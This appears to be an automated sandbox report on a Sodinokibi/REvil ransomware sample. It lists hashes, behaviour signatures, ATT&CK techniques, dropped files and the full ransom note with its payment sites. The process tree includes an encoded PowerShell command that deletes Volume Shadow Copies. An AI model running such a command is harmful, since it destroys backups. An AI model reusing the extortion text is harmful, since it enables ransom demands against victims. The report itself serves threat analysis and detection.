Resubmissions

07-09-2023 14:45

230907-r45fysaf5s 10

07-09-2023 14:12

230907-rjbyxaad5s 10

Analysis

  • max time kernel
    139s
  • max time network
    156s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
  • submitted
    07-09-2023 14:12

General

  • Target

    55bdc39b0b7686a57916d2fee2c0f9559e5b947d115bfcb6b5b255706a412670.exe

  • Size

    164KB

  • MD5

    5e2627aa0eda8c0f55f2b8f075c91e42

  • SHA1

    5628a78e002734c6885a0ab6ec97aa6425bcc882

  • SHA256

    55bdc39b0b7686a57916d2fee2c0f9559e5b947d115bfcb6b5b255706a412670

  • SHA512

    af01edf7497f19212f855f1717353227a2f35435c9adc4ca82fd4e2d31081a2d1ac1270c2330ceb20afc6c5be6f97782d8a3388f834bd9a3ecc2f7c78b6c087f

  • SSDEEP

    3072:xdHwJK3BMoFiWjmfb+HP+rnRfUMfm0Sl0/1:xNwE3q4jmfCHWtUWI6

Score
10/10

Malware Config

Extracted

Path

C:\Recovery\07e255630-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 07e255630. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/4F974E09500AD20B 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/4F974E09500AD20B Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: jX8QnoidfK8c3h58xcGP14uJEV9ExeDW2VRFYstcQTLrzrcXaHzD8/4udLv2X00D cjArzRj+zqP0Pc1dDUKYtc1+/O/GhBlz3FhgvZUHvN0OET31FvkYJ7pJm+cgWEta tOk7Ovmw/mBaPPDJEWp9+A35jrcBtX0gtpPOmiZEVugEUsWQ85CNGNZCv5Ef/FuH xu4ek7hUek+7lMZL/pY8ny4luZ/BA9dTD6duFDC1yLjG5EJ+E0qIpgFJvReaNAmv m2nYi1fKbLuAb1hUQU2VKIP53jP1DVmSxto+bytMT/zKRDntmjHy9ldoruYVuPmq UNPZycJv3Sph1Tn91d8tdPWurcwAHPh3LXiWFqPJNA1WIhTfrgZFQm0j0Ib4jg/l 7B9WeesCR1eDOHxTgYh4UgxlqpIPRhmH/4Ttvue0bBYqxKuAHNBXQqAGELGENrSO GRpyoluoOkKrxOD3n2kSMQWYAanOmCgkcOnVPvkxRKOoNq2Z56+/stQC3SHctTTo VtqIXDEHLj3tpRSUa3C8A4ENQ7mo+VD9YDVcQblMZ+QdeNJFJZme/XxZ9M//635W 7Cwpl2hTzQ8TRkXitB6p6A7lVbKmBFFyi7IGvBLHSTdi7bvoUcy0ZpJwN0IcIxGs KnGHo6jTBD2EJfiEdH7rDvYW5Rq+6s+JSdrP4FHeuhkUKq/LCEiP7tqCmAWcyk+B wiOHDPJdN8/Yf8bqB9h58mUvfd4ssXSvk5KOqEMWij02SFz4o1KI1xXVo00S4QV4 02SG+m3NI0LdMZdStv2BE7aGMAWtlwJSxFJrVMVjmTKLEmxMDNViZeJlqiECT6W/ EY2rDRlHoJkijLJHmezrgBEYW4nj773ZP/v6+gekEGILC2t99Uc4szW1w6ernN+u uKa/2pGHl56M9mE7SA8XoP6mpwWCUTHO/0rO0Oc4CtCs9I1Lu4z5+XNeUWMQm4LB WCHS0U6zgTEJc9ugBU7v6hcjrYwatLgSwmmvy96nQLS6rYqTRLKpRAXdES8PLKjr dgMt9Bz33V5xAQylydvGvlQ2CAFlIguKPx1+AqMImY/fRXnhuu7XBy+0TztXPNNL 6o+Qc8IzP5Cvh8E+iY/93fSkdkjeWrmJv6r74dqIDmc7RGKtmetXA49hP+GgM1Gp U0DS+uotIYEiMezIaxD0T/uzRvz1mUj0NOdIbQ8NdA0W6wleCjpdfn1o32JCJh/e LMptchfooN0Z2kiFX1jpydK1 Extension name: 07e255630 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/4F974E09500AD20B

http://decryptor.top/4F974E09500AD20B

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 38 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\55bdc39b0b7686a57916d2fee2c0f9559e5b947d115bfcb6b5b255706a412670.exe
    "C:\Users\Admin\AppData\Local\Temp\55bdc39b0b7686a57916d2fee2c0f9559e5b947d115bfcb6b5b255706a412670.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2096
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2572
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2632
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1716

Network

MITRE ATT&CK Matrix ATT&CK v13

  • Defense Evasion
    Modify Registry (2) T1112
    Subvert Trust Controls (1) T1553
    Install Root Certificate (1) T1553.004
  • Discovery
    Query Registry (1) T1012
    Peripheral Device Discovery (1) T1120
    System Information Discovery (1) T1082
  • Impact
    Defacement (1) T1491


Downloads

    • C:\Recovery\07e255630-readme.txt
      Filesize

      6KB

      MD5

      eff59c5dc729e81baa09733729388e39

      SHA1

      e1d20187e463f973e9426c829777d001b2888dae

      SHA256

      df27de97934b1e2df36026786dfd5ad42973da91fc8436b0850728fbfe2553eb

      SHA512

      53972a54fd4f4d64521c4bd6eeb37717112de6194e9a8bcf388cf628f5c1b5ab6fbe4c4a041d3982b0c388f15a6f6d1d8934877766ee59d23a5c5ddc4ac574e2

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      3f134ee5bb2a0446b2d2322e8d59860d

      SHA1

      0fcfd543e4708a4ec7f7e747844e59a97ec9b0a8

      SHA256

      95375f8833035c9300d5f07aa3699c393ce8b7226f0b7c74abab6245941d1e5a

      SHA512

      7780921a086ecc3a4391f1c03f059aa3cb33225150d5aa4e367d985f12be23f0af427814dd50285a91216f8bdaa8838de4fddcc5465018f08d0d7336581354dd

    • C:\Users\Admin\AppData\Local\Temp\Cab13A2.tmp
      Filesize

      61KB

      MD5

      f3441b8572aae8801c04f3060b550443

      SHA1

      4ef0a35436125d6821831ef36c28ffaf196cda15

      SHA256

      6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

      SHA512

      5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

    • C:\Users\Admin\AppData\Local\Temp\Tar14CD.tmp
      Filesize

      163KB

      MD5

      9441737383d21192400eca82fda910ec

      SHA1

      725e0d606a4fc9ba44aa8ffde65bed15e65367e4

      SHA256

      bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

      SHA512

      7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

    • C:\Windows\System32\catroot2\dberr.txt
      Filesize

      192KB

      MD5

      e29c46747fbab8ec4a7924ba26bf8831

      SHA1

      63a2d5bf6a48c2c0a0525ebe73d29768fbc2241b

      SHA256

      6f3f083eb9b8ff0f3df85952cd3e036f1b6cd82dba30483bf192c9ca16855a37

      SHA512

      0ab7eb731987594b9189af812fd4c2ccdb7e9e3a46b8494d7f664e6a4f7a2dcac358bd9454b605f11a02b7fc86025a46c79a6fd758d919cdbedd0304b43453ec

    • memory/2096-12-0x0000000000220000-0x0000000000226000-memory.dmp
      Filesize

      24KB

    • memory/2096-0-0x00000000001E0000-0x00000000001EA000-memory.dmp
      Filesize

      40KB

    • memory/2096-10-0x0000000002730000-0x0000000002839000-memory.dmp
      Filesize

      1.0MB

    • memory/2096-8-0x0000000000210000-0x0000000000211000-memory.dmp
      Filesize

      4KB

    • memory/2096-6-0x0000000000200000-0x0000000000201000-memory.dmp
      Filesize

      4KB

    • memory/2096-5-0x0000000000F10000-0x000000000103D000-memory.dmp
      Filesize

      1.2MB

    • memory/2096-11-0x0000000000220000-0x0000000000226000-memory.dmp
      Filesize

      24KB

    • memory/2096-25-0x0000000000210000-0x0000000000211000-memory.dmp
      Filesize

      4KB

    • memory/2096-1-0x00000000001E0000-0x00000000001EA000-memory.dmp
      Filesize

      40KB

    • memory/2096-4-0x00000000001F0000-0x00000000001F1000-memory.dmp
      Filesize

      4KB

    • memory/2096-3-0x0000000000680000-0x000000000071F000-memory.dmp
      Filesize

      636KB

    • memory/2096-9-0x0000000000220000-0x0000000000226000-memory.dmp
      Filesize

      24KB

    • memory/2096-2-0x0000000000D30000-0x0000000000DF9000-memory.dmp
      Filesize

      804KB

    • memory/2096-7-0x0000000000400000-0x000000000041F000-memory.dmp
      Filesize

      124KB

    • memory/2572-21-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp
      Filesize

      9.6MB

    • memory/2572-24-0x0000000001E90000-0x0000000001F10000-memory.dmp
      Filesize

      512KB

    • memory/2572-26-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp
      Filesize

      9.6MB

    • memory/2572-23-0x0000000001E90000-0x0000000001F10000-memory.dmp
      Filesize

      512KB

    • memory/2572-22-0x0000000001E90000-0x0000000001F10000-memory.dmp
      Filesize

      512KB

    • memory/2572-19-0x0000000001FB0000-0x0000000001FB8000-memory.dmp
      Filesize

      32KB

    • memory/2572-20-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp
      Filesize

      9.6MB

    • memory/2572-18-0x000000001B170000-0x000000001B452000-memory.dmp
      Filesize

      2.9MB